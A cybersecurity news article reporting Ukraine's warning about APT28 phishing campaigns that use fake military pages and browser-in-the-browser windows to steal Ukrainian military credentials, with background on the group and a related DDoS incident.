30 January 2024

Russian hackers APT28 target Ukraine’s military with phishing attacks to steal credentials


Russian hackers APT28 target Ukraine’s military with phishing attacks to steal credentials

Russian cyberespionage group APT28, affiliated with the Main Directorate of the General Staff of the Russian Armed Forces (GRU), has been conducting phishing attacks aimed at obtaining Ukrainian military personnel's credentials that would give it access to the country’s military situational awareness and command and control systems, Ukraine’s National Cyber Security Coordination Center (NCSCC) has warned.

The phishing campaign involves several attack vectors and is specifically targeting military personnel and units of the Ukrainian Defense Forces. In one instance, the attackers distributed a web page ostensibly containing military operational information regarding the Russian invasion. Once the page is opened, a field for entering credentials is presented to allegedly “confirm access”. The stolen credentials are then sent to an attacker-controlled server.

Another phishing tactic involves a document allegedly containing information on the activity of the ukr[.]net account. Upon clicking on the «Change password» button on the HTML page, a browser-in-the-browser (BitB) attack is launched to capture credentials.

The BitB attack is a phishing technique that simulates a login window with a spoofed domain within a parent browser window to steal credentials.

”In both cases, the credentials are exfiltrated to the actor-controlled server hxxp://202.55.80[.]225:35770, which is an Ubiquiti Edge router. The tactic of using pre-compromised Ubiquiti Edge routers to exfiltrate data has been observed by APT28 in previous phishing campaigns,” the NCSCC said.

APT28 (aka APT-C-20, ATK5, Blue Athena, Fancy Bear, Frozenlake, Fighting Ursa, Forest Blizzard, G0007, Grey-Cloud, Grizzly Steppe, Group 74, Group-4127, Iron Twilight, ITG05, Pawn Storm, SIG40, Snakemackerel, Strontium, Sednit, Sofacy, Swallowtail, T-APT-12, TA422, TG-4127, Tsar Team, TsarTeam, and UAC-0028) is a Russian-backed threat actor group believed to have been active since 2007.

The threat actor is primarily focused on political and defense-oriented targets, including government, defense and aerospace contractors, energy utilities, media, research companies, journalists, and information technology sector. Targeted regions include Ukraine, Europe (mostly NATO members), North America, the UAE, Middle East, and Syria.

APT28 uses a wide variety of spear-phishing techniques involving malicious email and credential harvesting using fake websites embedded with malicious links. The group is also known to leverage zero-day exploits, custom malware (Zebrocy, Sofacy, X-Agent, Chopstick, Coreshell, Jhuhugit, Advstoreshell, Drovorub, Skinnyboy), watering hole attacks, and Living-off-the-Land tactics in its attack activity.

Last year, the group was observed compromising government institutions and military entities involved in aircraft infrastructure in Ukraine via security flaws in vulnerable RoundCube webmail servers. The threat actor had also targeted Ukraine’s energy infrastructure facility.

In related news, the Ukrainian Coordination Headquarters for the Treatment of Prisoners of War overseeing the treatment of prisoners of war was hit by a distributed denial-of-service (DDoS) attack over the weekend. The access to its website has been restored, the agency said. It didn’t name the culprit behind the attack but linked the incident to the recent crash of the IL-76 plane in Belgorod Oblast (Russia), which Moscow claims was carrying 65 Ukrainian prisoners of war who were to be swapped. As of January 30, 2024, the Kremlin didn’t provide any evidence to support the claims. Furthermore, it has rejected a request for an international commission to investigate the incident.

“Apparently, the enemy decided that the information, in particular, about the details of the exchange of prisoners of war and the downing of the IL-76 plane carries a threat for them,” the coordination center said.

Back to the list

Latest Posts

Cyber Security Week in Review: September 6, 2024

Cyber Security Week in Review: September 6, 2024

In brief: the US charges Russian GRU hackers for attacks on Ukraine, Apache, Cisco, Zyxel patch high-risk flaws, Google fixes Android zero-day, and more.
6 September 2024
Threat actors using MacroPack Red Team framework to deploy Brute Ratel, Havoc and PhantomCore

Threat actors using MacroPack Red Team framework to deploy Brute Ratel, Havoc and PhantomCore

Some of the documents appeared to be part of legitimate Red Team exercises, while other were intended for malicious purposes.
5 September 2024
US seizes 32 domains linked to Russian Doppelganger influence campaign

US seizes 32 domains linked to Russian Doppelganger influence campaign

The domains, used to disseminate propaganda, were seized as part of a broader effort to disrupt Russia’s attempts to interfere in the 2024 US Presidential Election.
5 September 2024